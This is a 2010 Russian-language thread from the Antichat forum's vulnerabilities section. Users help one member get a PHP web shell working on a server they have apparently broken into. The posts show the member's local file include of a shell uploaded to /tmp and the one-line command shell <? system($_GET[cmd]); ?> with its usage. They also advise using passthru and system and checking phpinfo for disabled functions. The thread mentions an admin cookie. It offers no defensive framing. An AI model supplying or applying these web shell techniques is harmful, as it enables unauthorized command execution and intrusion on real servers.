HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.05.2010, 22:24
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

Gorev Повтарюсь что
eval
и
include
неработают!!

удалось только загрузить шел в папку тмп
и сделать локальный инклуид
cmd=include("/tmp/shell.php");
но и в этом случае такая же фигня получается...
 
Ответить с цитированием

  #2  
Старый 18.05.2010, 22:27
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

Цитата:
Сообщение от GOGA075  
Gorev Повтарюсь что
eval
и
include
неработают!!

удалось только загрузить шел в папку тмп
и сделать локальный инклуид
cmd=include("/tmp/shell.php");
но и в этом случае такая же фигня получается...
а через passthru пробовал?
 
Ответить с цитированием

  #3  
Старый 18.05.2010, 22:28
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

GOGA075

в сообщении Gorev-a нет Eval или include

тут функция system,будешь работать с командами системы
 
Ответить с цитированием

  #4  
Старый 18.05.2010, 22:32
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

ну а какие команды у нас идут под <? system($_GET[cmd]); ?> ??
 
Ответить с цитированием

  #5  
Старый 18.05.2010, 22:32
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

GOGA075 твой шелл shell.php?cmd=passthru('system commands');
мое предложениe shell.php?cmd=system commands
 
Ответить с цитированием

  #6  
Старый 18.05.2010, 22:54
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


По умолчанию

вот всё, что сверху в шеле написано, пока вы ничего не тыкаете (на ссылки, после чего шелл, зараза, отказывается работать), сюда выложите плз. А заодно посмотрите папочки, которые зелененькие. Так же не мешало бы для начала вместо кода шелла вставить код, воспроизводящий phpinfo, и внимательно там почитать, т.к. скорее что-то там точно ON и disabled
 
Ответить с цитированием

  #7  
Старый 18.05.2010, 23:24
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

Цитата:
Сообщение от Pashkela  
вот всё, что сверху в шеле написано, пока вы ничего не тыкаете (на ссылки, после чего шелл, зараза, отказывается работать), сюда выложите плз. А заодно посмотрите папочки, которые зелененькие. Так же не мешало бы для начала вместо кода шелла вставить код, воспроизводящий phpinfo, и внимательно там почитать, т.к. скорее что-то там точно ON и disabled
Вот сама ошибка

сервер работает под Linux

В принципе вапрос решился сам собой, после удаления куки админа!
 
Ответить с цитированием

  #8  
Старый 20.05.2010, 00:04
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

.Slip

кажется я что то нашел,но не уверен

http://www.citforum.ru/database/cache/gateway/

Последний раз редактировалось Konqi; 20.05.2010 в 00:24..
 
Ответить с цитированием

  #9  
Старый 20.05.2010, 00:28
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


По умолчанию

Про лфи - это ко мне, дооо. Просто пока ми изучаю низкоуровневые MSSQL inj
 
Ответить с цитированием

  #10  
Старый 20.05.2010, 00:34
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

Цитата:
Сообщение от .Slip  
...
там низкоуровневые запросы в SQL. "ну ты понел" (с)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.